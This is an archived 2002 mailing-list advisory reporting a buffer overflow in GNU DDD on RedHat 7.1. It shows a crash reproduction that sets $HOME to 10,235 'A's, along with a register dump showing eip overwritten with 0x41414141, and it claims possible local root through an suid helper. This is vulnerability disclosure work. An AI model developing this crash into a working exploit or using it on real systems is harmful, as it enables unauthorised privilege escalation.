ddd smashed

From: l0rt (simonat_private)
Date: Tue Jan 15 2002 - 12:28:21 PST

  • Next message: l0rt: "Evolution Cores (needs more work)"

    Program  : ddd
    OS       : Linux
    DISTRO   : RedHat 7.1
    Issue    : 0x41414141 (no core tho)
    Home Page: http://www.gnu.org/software/ddd/
    suid     : No
    sgid     : No
    Issue    : ddd may be called by an suid helper binary and could be 	  
    exploited to gain local root access.
    GNU DDD, the Data Display Debugger, is a GUI to command-line debuggers
    like GDB, DBX, JDB, XDB, Ladebug, WDB, the Perl debugger, or the Python
    debugger. It provides a graphical data display where complex data
    structures can be explored incrementally and interactively.
    Normally I use gdb to debug cores but today I decided to try ddd and my
    efforts failed.  When I set the $HOME in my test account to 10235 A's
    and I tried to run ddd like (I found an evolution core that will be
    explained in my next post):
    sh-2.04$ export HOME=`perl -e'print "A" x 10235'`
    sh-2.04$ ddd /usr/bin/evolution
    I get a bunch of A's that spew to my console and then some memory access
    errors as seen below:
    /.ddd/themes/" failed: File name too long
    /tmp/dddNhatCp:3: Error in sourced command file:
    Cannot access memory at address 0x41414141
    So... in light of this... I decided to use gdb to debug ddd which uses
    gdb.. heh...  
    Here is a dump of the registers...
    eax            0x8572ec4        139931332
    ecx            0x0      0
    edx            0xbfffbc20       -1073759200
    ebx            0x41414141       1094795585
    esp            0xbfffbc20       0xbfffbc20
    ebp            0x41414141       0x41414141
    esi            0x41414141       1094795585
    edi            0x41414141       1094795585
    eip            0x41414141       0x41414141
    eflags         0x10246  66118
    cs             0x23     35
    ss             0x2b     43
    ds             0x2b     43
    es             0x2b     43
    fs             0x0      0
    gs             0x0      0
    fctrl          0x37f    895
    fstat          0x120    288
    ftag           0xffff   65535
    fiseg          0x23     35
    fioff          0x400bf242       1074524738
    foseg          0x2b     43
    fooff          0xbfffac86       -1073763194
    fop            0x6a     106
    smashed ;o)
    	Secure Network Operations
    	Strategic Reconnaissance Team
    	Team Key ID: ACFCBD01
    	l0rt Key ID: 47BF3F87
    	"That secret you've been guarding, isn't."

    This archive was generated by hypermail 2b30 : Tue Jan 15 2002 - 12:58:37 PST